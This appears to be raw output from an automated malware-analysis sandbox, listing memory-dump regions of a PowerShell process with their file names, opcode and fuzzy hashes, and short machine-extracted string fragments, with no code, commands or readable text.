                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$(fll$(fll$(fll$(fll$84jl$84jl$tPjq$tPjq
                                                                                  • API String ID: 0-1637198715
                                                                                  • Opcode ID: 723cfd6f6b639f50037e1a6ae0d60467c18c61ab92c0f7008decabdd2c7f0147
                                                                                  • Instruction ID: 8e0d4a555869bbaf4506698dee2709aaacf8cb2c5139acd7b392360f48328e7f
                                                                                  • Opcode Fuzzy Hash: 723cfd6f6b639f50037e1a6ae0d60467c18c61ab92c0f7008decabdd2c7f0147
                                                                                  • Instruction Fuzzy Hash: 9A828DB4B00205CFDB14CF98C551AAABBB2EF89304F25C069E8199F355CB76EC46CB95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-159672019
                                                                                  • Opcode ID: 2ccd94d0713d6300c74f64c2eb0eb22344f5880595a2167119ad5f97459ee0e1
                                                                                  • Instruction ID: 3030eef522bfa7b411aebc5e4edc8346e6a13353bd28740c19b8a1171938f89d
                                                                                  • Opcode Fuzzy Hash: 2ccd94d0713d6300c74f64c2eb0eb22344f5880595a2167119ad5f97459ee0e1
                                                                                  • Instruction Fuzzy Hash: 9602B2B1B042158FDB14CB68C550AAABBF6EF89310F14806ADC15AF355DB36DE41CBA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-3488220606
                                                                                  • Opcode ID: fea846c9e7403deaf2d4f5d0d46ca2dfb5e96eb875392e7ff9c54535959c71f9
                                                                                  • Instruction ID: 09de9ea64b9e9396843e8b98102a34eeab6555464ab363e4d7612576dc72eec5
                                                                                  • Opcode Fuzzy Hash: fea846c9e7403deaf2d4f5d0d46ca2dfb5e96eb875392e7ff9c54535959c71f9
                                                                                  • Instruction Fuzzy Hash: D6F1F7F1704206DFCB258F6898507BABBB6FFC6211F18806ADC258B2D6DB35C945C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.]k$-]k
                                                                                  • API String ID: 0-3953135750
                                                                                  • Opcode ID: d15454750a40562cdde44a8530cf8c81f37446d7f6edb7e0851905237e8c976a
                                                                                  • Instruction ID: a043d55148fd51ecdb5d2d72a369c158aaad39032c9f296778b17a9e9b134710
                                                                                  • Opcode Fuzzy Hash: d15454750a40562cdde44a8530cf8c81f37446d7f6edb7e0851905237e8c976a
                                                                                  • Instruction Fuzzy Hash: ABD18BB4B402059FD718DB68C551AAEBBB3EFC8310F218429D8116F395CB76DC42CBA6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8eff66e6363d9b6ee92d198fa4ac0bc7db87b4c12a23aaedfcba2f9e343fc91d
                                                                                  • Instruction ID: 17dd84d286fa28d008cc37a651f9431e63c2559d01b6d7f28b64d3053687afc1
                                                                                  • Opcode Fuzzy Hash: 8eff66e6363d9b6ee92d198fa4ac0bc7db87b4c12a23aaedfcba2f9e343fc91d
                                                                                  • Instruction Fuzzy Hash: 4191B234A01244DFCB15EFA9D4849AEBBF2FF89364F1889A9E0459B361C735EC45CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: da3c3c28b05bd6a83892b4bbee1800ea61a8866358acfb1eaa0691c8cbc35b3f
                                                                                  • Instruction ID: 30fe9e4ddcb1f47958137aa53d962e7d36a0dedbbfb9fb3810f7a8e6ceb2feb1
                                                                                  • Opcode Fuzzy Hash: da3c3c28b05bd6a83892b4bbee1800ea61a8866358acfb1eaa0691c8cbc35b3f
                                                                                  • Instruction Fuzzy Hash: D0917A74A00645CFCB05CF58C5949AEFBB1FF89320B24859AD615AB3A5C735FC91CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab940546458469d737a9ddb7f9bf97716e30e547a2b61eb1e29a806af5a845df
                                                                                  • Instruction ID: e43bed2d514f0f6c1da2e5ef984ee99e3826724bba5b16af0868cc254c57ba68
                                                                                  • Opcode Fuzzy Hash: ab940546458469d737a9ddb7f9bf97716e30e547a2b61eb1e29a806af5a845df
                                                                                  • Instruction Fuzzy Hash: 6171BE70A00219CFDB14DF69C880A9DBBF2FF84324F14856AD40AAB666DB75AC46CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c77ba3eaa046c37b8176be5419557de3072baa579463e689833683d2d434bfd0
                                                                                  • Instruction ID: ff74481c369c0eb03e006f4b582693b70ba6621b8c9e547913b73d8b05b9c09c
                                                                                  • Opcode Fuzzy Hash: c77ba3eaa046c37b8176be5419557de3072baa579463e689833683d2d434bfd0
                                                                                  • Instruction Fuzzy Hash: F1714B71E002599FEB14DFA5D480AADBBF6FF88314F148429D402AB2A5DB74AD46CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 623317996718510ff245301eea1173d3787c23a26f60fb618f945a0ea545831d
                                                                                  • Instruction ID: 951616435b0a0a0ff7d0c420a5cf90d3fd5b3838ae9aa4bf17518141ef6692dc
                                                                                  • Opcode Fuzzy Hash: 623317996718510ff245301eea1173d3787c23a26f60fb618f945a0ea545831d
                                                                                  • Instruction Fuzzy Hash: 93518170A00219DFEB14DFA9C884BADBBB6FF84314F14942DD406AB656DBB4AC49CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2409471358.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b29fe880985c5d42b446a332ff0215a757604f241e624525730814348a5967d
                                                                                  • Instruction ID: fcd0602c7f6e8aabf83eb044c30af931cd90b8d22c451ede77e2281e4abae258
                                                                                  • Opcode Fuzzy Hash: 0b29fe880985c5d42b446a332ff0215a757604f241e624525730814348a5967d
                                                                                  • Instruction Fuzzy Hash: 7241CFF1B45313DFCF20CE288541ABA7FA2AB85250F5984BBD9049B3B5D731D941C7A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd9df810dc766c37af25e2e016663c0c2cd39a9ad412ceaf2b24438cdf2e8900
                                                                                  • Instruction ID: 6e5797b3793bf722b24436caf5f2486dba00bca56acd5870f5c92267a7e1b8eb
                                                                                  • Opcode Fuzzy Hash: bd9df810dc766c37af25e2e016663c0c2cd39a9ad412ceaf2b24438cdf2e8900
                                                                                  • Instruction Fuzzy Hash: 60418F316002048FDB14EF69D598AAD7BB2FF89314F09506CD406EB7AADB74AC45CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43b9155582ca01471f21e3c8fbe0574de656aefd320c57af6ad55b6dcfbe3b2c
                                                                                  • Instruction ID: 09c2673822033a70e53ee40bef61670502ff4cd95d73a0db74a33ddbec20f743
                                                                                  • Opcode Fuzzy Hash: 43b9155582ca01471f21e3c8fbe0574de656aefd320c57af6ad55b6dcfbe3b2c
                                                                                  • Instruction Fuzzy Hash: 8F411774A00505DFCB09CF59C5949AAFBB1FF48324B258599D605AB3A4C732FD90CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0782570adc09295c6c636c6da96b904a978bdabfdfe8765f09a84a535c822587
                                                                                  • Instruction ID: bf179cae7b3264b582466407b8636f2e81b4a26d7550c705a3dd7339a08e4b88
                                                                                  • Opcode Fuzzy Hash: 0782570adc09295c6c636c6da96b904a978bdabfdfe8765f09a84a535c822587
                                                                                  • Instruction Fuzzy Hash: 9F215074A042159FCB00CF98C5809AEFBB5FF89310B158596D919EB352C734FD41CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 089e6b3eb9aee95a0ac44c4b7538fd14dc63708d0be722c680c912cbfad54db5
                                                                                  • Instruction ID: 5ee1339ee400a70d95931f16c6dd4659d257f3c0c8022c44eb0762a2ebdd8970
                                                                                  • Opcode Fuzzy Hash: 089e6b3eb9aee95a0ac44c4b7538fd14dc63708d0be722c680c912cbfad54db5
                                                                                  • Instruction Fuzzy Hash: CC216A74A002098FCB00CF98D9809AEFBB5FF89310B15859AE909EB352C731FD41CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7da55865ab2b81cf4d4491da0e5d05991c1daf840a556143877482f92f96210d
                                                                                  • Instruction ID: a6dac81d20ac1c9a64cdcbce800f2544bb3e631c70faacfe621ac45dd9587c57
                                                                                  • Opcode Fuzzy Hash: 7da55865ab2b81cf4d4491da0e5d05991c1daf840a556143877482f92f96210d
                                                                                  • Instruction Fuzzy Hash: 39F030B1604615EFC3285F28D9C051BB7A6BFC8368B79C93DD86957644CB31AC81CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 085b90a9bbf361e60aca2d3c469ceb051d691763da48df457e572b572c195a2b
                                                                                  • Instruction ID: 4dc68193f7b74435675fe271ca0ffff0fb3029d38c603669a1067c452fd11970
                                                                                  • Opcode Fuzzy Hash: 085b90a9bbf361e60aca2d3c469ceb051d691763da48df457e572b572c195a2b
                                                                                  • Instruction Fuzzy Hash: 4C014F71A00109DFCB14CF88D9809ADF7B2FF88324B248668D419A7695CB32EC51CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2bbe84020e3550f99715830be302857c170e477cc31f434508be60de4d2dd373
                                                                                  • Instruction ID: 5aa784f67a0bc2640eb85a4a6e35cb8f4ce6f646120745ddad02ba0f23054e96
                                                                                  • Opcode Fuzzy Hash: 2bbe84020e3550f99715830be302857c170e477cc31f434508be60de4d2dd373
                                                                                  • Instruction Fuzzy Hash: 22F05435A001189FCB40CF9DD8509EDFBBAFF8C324B248159E418A32A5C736EC52CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: T\k$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$DU\k$XYll$XYll$$jq$$jq$$jq
                                                                                  • API String ID: 0-237230307
                                                                                  • Opcode ID: 905cf17f2e45dbfe82943e55ae225a9159f2c7491772c17c6d55b104f608391c
                                                                                  • Instruction ID: 07f85bdb9bcc495891acd55b77cb3ad7c734ea6b79a0f789acc3fd262c1acd39
                                                                                  • Opcode Fuzzy Hash: 905cf17f2e45dbfe82943e55ae225a9159f2c7491772c17c6d55b104f608391c
                                                                                  • Instruction Fuzzy Hash: 0CE102B1B4421ACFCB149F68D8846AABBB2EFC5211F14C06ADC25DF255CB35CD45CBA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$]$tPjq$tPjq$$jq$$jq$$jq$bl$bl$bl$bl
                                                                                  • API String ID: 0-3057480511
                                                                                  • Opcode ID: 4a9ec03cb610329509ddbaa346c62696ac1ff304c8c07b67dfe8deb347e8e887
                                                                                  • Instruction ID: f2e9eac11f63f2b5d98f3f8a0ccafd6c79179031d85bace7f176359305a344b1
                                                                                  • Opcode Fuzzy Hash: 4a9ec03cb610329509ddbaa346c62696ac1ff304c8c07b67dfe8deb347e8e887
                                                                                  • Instruction Fuzzy Hash: DCF133B2B04216CFCB248F6894106BABBB6EFC5310F14847BDD65CB255DB35C945CBA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-2815571254
                                                                                  • Opcode ID: 7c479f24f4e215c62647a746f9b36a4df336b8f28a6b50dbb10a780b5c11a02d
                                                                                  • Instruction ID: 9a185f134f48572b4bd3ad923e5c2413e031c449d790bbece2e65cfb1331af0b
                                                                                  • Opcode Fuzzy Hash: 7c479f24f4e215c62647a746f9b36a4df336b8f28a6b50dbb10a780b5c11a02d
                                                                                  • Instruction Fuzzy Hash: A1A116F17042169FCB298B69D8503BA7BB6FFC1220F14847ADD25CB2D5DA35C845C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-396422569
                                                                                  • Opcode ID: d7fc84db8ec301b8b699130e7c871bbac99ad5e355efaabb364427bae3bc97d0
                                                                                  • Instruction ID: 96e59ecd5986e25da91d7a967e73df1edf6545a4237e828b294baa7f21d13195
                                                                                  • Opcode Fuzzy Hash: d7fc84db8ec301b8b699130e7c871bbac99ad5e355efaabb364427bae3bc97d0
                                                                                  • Instruction Fuzzy Hash: 1FA146B1B002199FCB159B68C4407BABBA3EFC5310F14C56ADD258B284DB36DD01C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: (fll$(fll$(fll$(fll$4'jq$4'jq$4il$4il$tL^k
• API String ID: 0-2836958792
• Opcode ID: 243067d015f05bf61c3ba5f0cce9017b15fc0a1ea5249a680141197008abd004
• Instruction ID: 0acf843663c290d422ec381d5814214e5e3c7461b02edac52584887723f4a4dd
• Opcode Fuzzy Hash: 243067d015f05bf61c3ba5f0cce9017b15fc0a1ea5249a680141197008abd004
• Instruction Fuzzy Hash: DD61CEB0B00205DFDB14CB68C590A6ABBF3EFC8714F148469D825AB755CB36EC42CB96

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 84jl$84jl$84jl$84jl$tPjq$tPjq$tPjq$tPjq
• API String ID: 0-126783722
• Opcode ID: b723be7035dbdad59b810207d5d0d396072d69e2b5563a3f673794fc22a8121a
• Instruction ID: d1a62d26ea336c6ac5985c6bc4212edd09a3a6ce8b2b946ade19b8f9592e1029
• Opcode Fuzzy Hash: b723be7035dbdad59b810207d5d0d396072d69e2b5563a3f673794fc22a8121a
• Instruction Fuzzy Hash: 3BD126B17082159FC7248F68C450A6ABBA2FFC9311F18C86AED169F391DB31DE41C7A5

Strings
Memory Dump Source
• Source File: 00000006.00000002.2409471358.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
Similarity
• API ID:
• String ID: 84jl$84jl$84jl$84jl$tPjq$tPjq$tPjq$tPjq
• API String ID: 0-126783722
• Opcode ID: 86c60f5441a20013b65f4c8ea47c1ca5ab97b868fa2625513080bd9e5d6b7ca8
• Instruction ID: 7964a91aa576c77ee813cb439e112a35c4a962c0a862c7bf20c819e1a542a76c
• Opcode Fuzzy Hash: 86c60f5441a20013b65f4c8ea47c1ca5ab97b868fa2625513080bd9e5d6b7ca8
• Instruction Fuzzy Hash: 09C193B570021AAFCF15DF58C550AABBFA6BF85310F148876E9019B390C7B5DC42CBA1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: (fll$(fll$4'jq$4'jq$x.]k$-]k
• API String ID: 0-2761045000
• Opcode ID: c3589e3f391fbcedbd0f77b3a955283b01a04b708f333e7776d8f89c59887254
• Instruction ID: 150c70c31cdd6a6b39c46a8faf0f0aba666950c96199fc865699a8308348b5f0
• Opcode Fuzzy Hash: c3589e3f391fbcedbd0f77b3a955283b01a04b708f333e7776d8f89c59887254
• Instruction Fuzzy Hash: 3EC1AFB0B00205DFD724DF54C590BAFBBB2EF88714F148419D8166F759CB76A846CBA1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: (fll$(fll$4'jq$4'jq$x.]k$-]k
• API String ID: 0-2761045000
• Opcode ID: 506850322dbfba520dfdd497c9dd82f03a1fca527ca5b52720a7902ed4e39de8
• Instruction ID: 6e24e1200f961ea248e49b63cecc92a666c3f98bfec06b04f6ab6c843bb34ea8
• Opcode Fuzzy Hash: 506850322dbfba520dfdd497c9dd82f03a1fca527ca5b52720a7902ed4e39de8
• Instruction Fuzzy Hash: 7BC1AFB0B00205DBD724DF94C590B6FBBB2EF88714F148419D8266B758CB76EC46CBA1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$4'jq$4'jq$k$x.]k$-]k
• API String ID: 0-4211736190
• Opcode ID: 87281e22a95bb02df7f7285adaf8e230a85cd1a25a15ec7a1579d18fabd58eef
• Instruction ID: 9726f9a4e6398f22b815e76ec1e008215e45d7c850fea2acae7202d79194b7ec
• Opcode Fuzzy Hash: 87281e22a95bb02df7f7285adaf8e230a85cd1a25a15ec7a1579d18fabd58eef
• Instruction Fuzzy Hash: 53A17FB0A402298FDB24DB14C951BEEB7B2EB85704F1080D9D9096B345CB75AE85CFA5

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
• API String ID: 0-210473685
• Opcode ID: 03852be11e5b1806f05c3863d62421edefd5b0155fe591594cdc69b89122bf3f
• Instruction ID: c77ece671f6b532d548f9947d65f750afb16b68214bc64affd9c65d63adcf434
• Opcode Fuzzy Hash: 03852be11e5b1806f05c3863d62421edefd5b0155fe591594cdc69b89122bf3f
• Instruction Fuzzy Hash: 846103B170420ADFCB248F69D4002BABBB6EFC5221F15C07ADD298B251DB39DD41C7A1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$84jl$tPjq$$jq$$jq$$jq
• API String ID: 0-2425343769
• Opcode ID: 3ee56ae552e550f38510e8b3012e1a526ff6d9ce7209c28806948972eaea805d
• Instruction ID: 536c61de060080f8f1304c0d35e5a550ab52e6b1196ba5a15274daddebc11970
• Opcode Fuzzy Hash: 3ee56ae552e550f38510e8b3012e1a526ff6d9ce7209c28806948972eaea805d
• Instruction Fuzzy Hash: 71618FB4710206DFDB288F54C5497BA7FB2BB85315F54C266EC216B2A0CB75DD80CBA2

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: (fll$(fll$4'jq$4il$tL^k
• API String ID: 0-923200292
• Opcode ID: 911559092380c397db08bc7a418d39470e93c6fb519a5e44b1390d3e0cea9263
• Instruction ID: 3efb3ead2af410c67f3036b38f2a9bec59dda90083593a998291513dfd91d572
• Opcode Fuzzy Hash: 911559092380c397db08bc7a418d39470e93c6fb519a5e44b1390d3e0cea9263
• Instruction Fuzzy Hash: 7F5180B0B00205DBDB14CF58C590AAABBF3EF89714F14C569D829AB751CB36E841CF92

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: $ak$84jl$84jl$tPjq$tPjq
• API String ID: 0-1376893690
• Opcode ID: fe96651855570f82a0e8db17aee5e6677f642e7621b80cb604c4ba3b00996db9
• Instruction ID: 99745bd250b849cf7257233698a8bf64e07b922e908f359a919353f07115330e
• Opcode Fuzzy Hash: fe96651855570f82a0e8db17aee5e6677f642e7621b80cb604c4ba3b00996db9
• Instruction Fuzzy Hash: F3414371704315AFCF209B699800B6ABBB6FFC5798F18C46AED549F285CA32CC01C7A1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$tPjq$$jq$$jq$$jq
• API String ID: 0-728028659
• Opcode ID: c4e03068786e1ea301917fd4299ec72c27f16a28c53f511bdac8d79290a1c8a1
• Instruction ID: 582d9c66bbe8f04bf3055948a5b5195edc05f4f3a5b6e41d7d7c8624b24e3706
• Opcode Fuzzy Hash: c4e03068786e1ea301917fd4299ec72c27f16a28c53f511bdac8d79290a1c8a1
• Instruction Fuzzy Hash: C84138B0A04209EFDB268F44C540BB5B7B3EF86310F08C1AAED259F291C735C941CBA1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 84jl$XRoq$XRoq$tPjq$$jq
• API String ID: 0-1503762729
• Opcode ID: f4a7084183737b6d85a78ba0bde39f980a76d1e07b288e92b8ae39727eeb2ac3
• Instruction ID: 2583bf6141db96a51db6cc4fd3cf6f433b4dee7ccadfbc2b82e8753bc94566b9
• Opcode Fuzzy Hash: f4a7084183737b6d85a78ba0bde39f980a76d1e07b288e92b8ae39727eeb2ac3
• Instruction Fuzzy Hash: 79416FB5B00205DFCB24CF59C144AAABBF2AF85311F19C26AEC25AB651C771DD81CFA1

Strings
Memory Dump Source
• Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$$jq$$jq$$jq$$jq
• API String ID: 0-651010669
• Opcode ID: ef9a4f592a8a7e3184c2b474abffe5b920152627aa1261f5205c8874e60a1210
• Instruction ID: 1b211a74a4448b02e00e3e4dcb4e38ee9d93f0a2329ab192bc30cef24601a3b3
• Opcode Fuzzy Hash: ef9a4f592a8a7e3184c2b474abffe5b920152627aa1261f5205c8874e60a1210
• Instruction Fuzzy Hash: DD2189F1610216EFDB388F06C580B76B7B9BF82661F19407AED349B2D1C771C880C6A1

Strings
